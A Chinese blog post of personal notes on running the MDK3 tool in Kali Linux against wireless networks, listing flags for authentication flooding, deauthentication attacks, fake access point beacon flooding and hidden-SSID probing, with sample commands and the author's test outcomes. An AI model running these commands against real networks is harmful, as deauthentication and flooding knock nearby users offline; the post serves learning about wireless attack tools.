kali系统下的MDK3攻击

版权声明:本文为博主原创文章,未经博主允许不得转载。 https://blog.csdn.net/GenteelDevil/article/details/54093953
1身份验证攻击
    mdk3 mon0 a
          -a <ap_mac> #测试指定BSSID
          -m #使用有效数据库中的客户端mac地址
          -c #对应 -a ,不检查是否测试成功
          -i <ap_mac> #对指定BSSID进行智能攻击
          -s <pps> #速率,默认50
#测试似乎没有什么效果 mdk3 wlan0mon a -a 8C:A6:DF:37:13:2C -s 20
2伪造断开连接
在这个模式下,软件会向周围所有可见AP不断发出“断开连接”的包……可以造成一定范围内的无线网络瘫痪(当然有白名单,黑名单模式),直到手动停止攻击!

    mdk3 mon0 d
          -w <filename>             #白名单mac地址列表文件
          -b <filename>              #黑名单mac地址列表文件
          -s <pps>                        #速率,这个模式下默认无限制
          -c [chan,chan,chan,…]                  #信道,可以多填,如 2,4,5,1
#测试效果良好 应该有针对对应AP的方法 我找找 dk3 wlan0mon d -c 1
#后加--bssid MAC
#mdk3 --help d

3伪造AP
产生大量死亡SSID来充斥无线客户端的无线列表,扰乱用户;还可以自定义发送死亡SSID的BSSID和ESSID、加密方式(如wep/wpa2)等。感觉鸡肋

    mdk3 mon0 b
          -n <ssid>        #自定义ESSID
          -f <filename>            #读取ESSID列表文件
          -v <filename>           #自定义ESSID和BSSID对应列表文件
          -d       #自定义为Ad-Hoc模式
          -w         #自定义为wep模式
         -g        #54Mbit模式
         -t   # WPA TKIP encryption
         -a #WPA AES encryption
          -m #读取数据库的mac地址
          -c <chan> #自定义信道
          -s <pps> #发包速率
    mdk3 –help b #查看详细内容
#mdk3 wlan0mon b -f /root/桌面/WIFI.txt
#伪造成功!

4探测AP信息和ESSID猜测
    mdk3 mon0 p
          -e <ssid>          #待检测的ssid
          -f <filename>          #检测AP设置为隐藏的ssid列表文件
          -t <bssid>               #用bssid检测AP的信息
          -s <pps>                #速率,默认300
          -b <character set>              #设置字符集
#并不知道有什么实际价值 后面遇见说吧

展开阅读全文

没有更多推荐了,返回首页